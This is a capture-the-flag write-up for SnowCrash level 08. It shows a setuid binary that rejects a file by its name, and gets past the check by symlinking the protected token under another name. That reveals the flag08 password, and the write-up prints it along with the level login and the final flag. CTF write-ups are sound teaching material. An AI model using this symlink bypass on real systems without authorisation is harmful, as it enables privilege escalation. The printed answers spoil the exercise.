# Level 08

## how to login

username: level08

password: fiumuikeil55xe9cu4dood66h

## Goal

run `getflag` as user `flag08`

## Actually doing something

```bash
level08@SnowCrash:~$ ll
total 28
dr-xr-x---+ 1 level08 level08  140 Mar  5  2016 ./
d--x--x--x  1 root    users    340 Aug 30  2015 ../
-r-x------  1 level08 level08  220 Apr  3  2012 .bash_logout*
-r-x------  1 level08 level08 3518 Aug 30  2015 .bashrc*
-rwsr-s---+ 1 flag08  level08 8617 Mar  5  2016 level08*
-r-x------  1 level08 level08  675 Apr  3  2012 .profile*
-rw-------  1 flag08  flag08    26 Mar  5  2016 token
```

intresting, we have the usual setuid binary, but we also have a file we can't read named token. I wonder if the flag is there

lets run the binary and see what happens

```bash
level08@SnowCrash:~$ ./level08 
./level08 [file to read]
level08@SnowCrash:~$ ./level08 token
You may not access 'token'
```
It is a little bit smart, lets try to outsmart it by using symlinks

```bash
level08@SnowCrash:~$ ln -s $(realpath token) /tmp/level08
level08@SnowCrash:~$ ./level08 /tmp/level08
quif5eloekouj29ke0vouxean
```
the old tale of checking for filename, and not actual file !

we can now get the actual token with that password:
```bash
level08@SnowCrash:~$ su flag08 -c getflag
Password: 
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
```